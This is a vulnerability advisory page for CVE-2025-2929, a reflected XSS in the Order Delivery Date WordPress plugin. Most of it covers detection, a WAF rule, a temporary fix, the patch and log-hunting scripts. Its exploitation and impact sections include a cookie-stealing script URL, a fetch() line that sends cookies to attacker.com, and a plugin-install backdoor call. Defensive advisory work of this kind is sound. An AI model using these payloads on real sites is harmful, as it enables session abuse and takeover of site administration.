How CVE-2025-2929 Works
The Order Delivery Date WordPress plugin (versions before 12.4.0) fails to sanitize user-supplied input in the `delivery_date` parameter before reflecting it into admin dashboard responses. An attacker crafts a URL whose `delivery_date` value carries a JavaScript payload; if an authenticated administrator opens that link, the payload executes in the administrator's browser session. The root cause is that the plugin echoes the parameter straight into the page, effectively `echo $_GET['delivery_date']`, with no output encoding and no nonce check that would reject a request the administrator did not initiate. Exploitation requires social engineering (the victim must visit the link), but a successful attack runs with the administrator's privileges, which is why this reflected XSS is treated as a privilege-escalation issue.
DailyCVE Form
Platform: WordPress
Version: <12.4.0
Vulnerability: XSS
Severity: Medium
Date: 06/12/2025
Prediction: Patch by 07/15/2025
What Undercode Says:
Exploitation:
https://victim-site.com/wp-admin/?delivery_date=<script>alert(document.cookie)</script>
Detection:
curl -sk -L -b cookies.txt "https://target/wp-admin/?delivery_date=%3Cxsscanary7f3a%3E" | grep -q "<xsscanary7f3a>" && echo "Vulnerable"
Send the probe with a logged-in admin cookie jar: an unauthenticated request to wp-admin is redirected to wp-login.php, and that page echoes the query string (URL-encoded) in its redirect_to field, so a grep for a bare marker like TEST reports "Vulnerable" on a site that is not. Grepping for the marker together with its angle brackets only matches when the brackets came back unencoded.
Mitigation:
1. Apply the plugin update (12.4.0 or later) immediately.
2. Until then, add a WAF rule that rejects `delivery_date` values containing angle brackets, raw or percent-encoded. nginx's `$args` is not URL-decoded, so a rule that only looks for `<` and `>` is bypassed with `%3C`/`%3E`:
location /wp-admin/ { if ($args ~* "delivery_date=[^&]*(<|>|%3c|%3e)") { return 403; } }
Temporary Fix:
Add this to the theme's functions.php. `init` is an action hook, so `add_action` is the idiomatic call (WordPress stores actions and filters in the same hook table, so `add_filter` also fires here, but it reads as a mistake). PHP builds `$_REQUEST` as a separate copy at startup, so set it as well in case the plugin reads the parameter from there:
add_action('init', function () {
    if (isset($_GET['delivery_date'])) {
        // Encode <, >, &, " and ' so a reflected value renders as text.
        $_GET['delivery_date'] = htmlspecialchars($_GET['delivery_date'], ENT_QUOTES, 'UTF-8');
        $_REQUEST['delivery_date'] = $_GET['delivery_date'];
    }
});
This is a stopgap for one parameter only; it does not fix the missing output encoding in the plugin itself.
Verification:
import requests

# Probe: a harmless tag with a unique marker, so a hit cannot be a coincidental
# "<img" that is already part of the dashboard markup.
url = "http://localhost/wp-admin/"
params = {"delivery_date": "<xsscanary7f3a>"}
# wp-admin redirects unauthenticated requests to wp-login.php, which only echoes
# the query string URL-encoded, so send the request as a logged-in admin.
admin_cookies = {}  # copy the wordpress_logged_in_* cookie from a test admin session
response = requests.get(url, params=params, cookies=admin_cookies, allow_redirects=True)
assert "<xsscanary7f3a>" not in response.text, "Vulnerable: delivery_date reflected without encoding"
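Both the curl check and the Python check above hinge on telling a verbatim reflection apart from an encoded one, and on not mistaking the wp-login.php redirect page for a hit. The following is an added example written for this page, not code from the advisory or from the plugin: a response classifier that separates those cases, exercised on constructed HTML fragments, plus an optional live probe that assumes you supply your own test site URL and a logged-in admin cookie.

```python
"""Classify how a probe value comes back in a WordPress admin response.

Added example for this page, not the plugin's code. The sample response
bodies below are constructed, not captured from a real site.
"""
import html
from urllib.parse import quote

# Unique marker so a hit cannot be a "<img" or "TEST" that is already on the page.
CANARY = "xsscanary7f3a"
PROBE = f"<{CANARY}>"   # harmless tag; what matters is whether '<' and '>' survive


def classify_reflection(body: str, canary: str = CANARY) -> str:
    """Return 'raw', 'login-page', 'encoded' or 'absent'.

    raw        -> angle brackets reflected verbatim: the browser parses them (vulnerable)
    login-page -> wp-admin bounced us to wp-login.php: not authenticated, and the
                  canary is only present URL-encoded inside redirect_to
    encoded    -> canary came back HTML- or URL-encoded (the patched behaviour)
    absent     -> parameter not reflected in this response at all
    """
    probe = f"<{canary}>"
    if probe in body:
        return "raw"
    if 'name="log"' in body and "wp-login.php" in body:   # WordPress login form markers
        return "login-page"
    if html.escape(probe, quote=True) in body or quote(probe, safe="") in body:
        return "encoded"
    return "absent"


def is_vulnerable(body: str, canary: str = CANARY) -> bool:
    """Only a verbatim reflection counts; an encoded echo is the fixed behaviour."""
    return classify_reflection(body, canary) == "raw"


def probe_live(base_url: str, admin_cookies: dict) -> str:
    """Send the probe as an authenticated admin and classify the final response.

    Assumptions: base_url is a test site you own and admin_cookies holds a valid
    wordpress_logged_in_* cookie copied from a browser session.
    """
    import requests  # imported here so the offline classifier has no dependency
    r = requests.get(f"{base_url.rstrip('/')}/wp-admin/",
                     params={"delivery_date": PROBE},
                     cookies=admin_cookies, allow_redirects=True, timeout=10)
    return classify_reflection(r.text)


# Constructed fragments standing in for the three kinds of response you can get back.
SAMPLE_VULNERABLE = '<div class="wrap"><h1>Orders</h1>Delivery date: <xsscanary7f3a></div>'
SAMPLE_FIXED = '<div class="wrap"><h1>Orders</h1>Delivery date: &lt;xsscanary7f3a&gt;</div>'
SAMPLE_LOGIN = (
    '<form name="loginform" action="https://target/wp-login.php" method="post">'
    '<input type="text" name="log" id="user_login">'
    '<input type="hidden" name="redirect_to" '
    'value="https://target/wp-admin/?delivery_date=%3Cxsscanary7f3a%3E"></form>'
)

if __name__ == "__main__":
    for name, body in [("vulnerable", SAMPLE_VULNERABLE), ("fixed", SAMPLE_FIXED), ("login", SAMPLE_LOGIN)]:
        print(f"{name:10s} -> {classify_reflection(body)}")
```

The point of classifying rather than substring-matching: a plain `grep TEST` (or `"<img" not in response.text`) treats the login page, which carries the probe URL-encoded in redirect_to, the same as a genuine reflection, and treats an HTML-encoded echo from the patched plugin as a miss only by luck of the marker chosen.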
Impact Analysis:
– Cookie theft via:
fetch('https://attacker.com/log?cookie='+document.cookie)
WordPress sets its authentication cookies with the HttpOnly flag by default, so `document.cookie` does not expose them; in practice the injected script rides the victim's live session rather than exfiltrating it.
– Admin session hijacking
– Backdoor installation via:
jQuery.post('/wp-admin/admin-ajax.php', { action: 'install_plugin', plugin: 'malicious.zip' })
This line is illustrative only. Core's privileged admin-ajax handlers check a nonce, so a working payload first fetches an admin page in the victim's session, extracts the nonce from it, and then submits the install or upload request with that nonce attached.
Patch Analysis:
Version 12.4.0 fixes the issue by sanitizing the input and escaping it at output, in the form:
$safe_date = sanitize_text_field($_GET['delivery_date']); echo esc_html($safe_date);
`esc_html()` is what actually stops the XSS: it encodes `<`, `>`, `&` and quotes so the browser renders the value as text. `sanitize_text_field()` strips tags and control characters on the way in, but it is not an output-encoding function and should not be relied on alone.
Monitoring:
SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%delivery_date%';
A reflected XSS leaves nothing in the database, so this query only surfaces a payload that was subsequently stored; the access log is the primary evidence source.
Log Analysis:
grep -Ei 'GET /wp-admin/[^ ]*delivery_date=[^ ]*(<|>|%3c|%3e|onerror|onload|javascript:)' access.log | awk '{print $1}' | sort | uniq -c | sort -rn
The original pattern's `.` matched any single character, so it caught `?delivery_date` but also every legitimate date lookup; restricting the match to values containing angle brackets (raw or percent-encoded) or event-handler names cuts the noise to actual probes, and the `sort | uniq -c` tallies attempts per source IP.
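A one-line grep cannot follow percent-encoding, and the nginx rule in the mitigation section has the same blind spot. As an added example for this page (not from the advisory, and not real traffic), the following scanner parses combined-format access log lines, URL-decodes the `delivery_date` value once the way PHP's `$_GET` does and then a couple of extra rounds to expose double-encoded probing, and counts flagged wp-admin requests per source IP. The log lines are constructed.

```python
"""Hunt for delivery_date XSS attempts in a combined-format access log.

Added example for this page; the log lines are constructed, not real traffic.
"""
import re
from collections import Counter
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that never belong in a legitimate delivery date.
SUSPICIOUS = re.compile(r'<|>|javascript:|\bon\w+\s*=', re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding.

    PHP decodes once, so a double-encoded value never reaches the plugin as '<';
    the extra rounds exist to surface probing attempts, not to prove exploitability.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(path: str) -> Optional[str]:
    """Return the decoded delivery_date payload if it looks like XSS, else None."""
    parts = urlsplit(path)
    if not parts.path.startswith("/wp-admin/"):
        return None
    # parse_qs already performs one URL-decode, matching what PHP's $_GET sees.
    for value in parse_qs(parts.query, keep_blank_values=True).get("delivery_date", []):
        decoded = decode_fully(value)
        if SUSPICIOUS.search(decoded):
            return decoded
    return None


def scan_log(lines) -> Counter:
    """Count flagged wp-admin requests per client IP."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and flag_request(m["path"]):
            hits[m["ip"]] += 1
    return hits


# Constructed sample: one benign lookup, three probes, one request outside wp-admin.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2025:10:01:02 +0000] "GET /wp-admin/?delivery_date=2025-06-12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jun/2025:10:02:15 +0000] "GET /wp-admin/?delivery_date=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jun/2025:10:02:40 +0000] "GET /wp-admin/?delivery_date=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5300 "-" "curl/8.5"',
    '198.51.100.7 - - [12/Jun/2025:10:05:00 +0000] "GET /wp-admin/admin.php?page=orders&delivery_date=x%22%20onmouseover%3D%22alert(1) HTTP/1.1" 200 6100 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jun/2025:10:05:30 +0000] "GET /index.php?delivery_date=%3Cb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in scan_log(SAMPLE_LOG).most_common():
        print(f"{n:3d}  {ip}")
```

Feed it real lines with `scan_log(open("access.log"))`; the fourth sample shows why matching only `<script>` is not enough, since an attribute-breakout payload like `x" onmouseover="...` carries no angle brackets at all.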
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode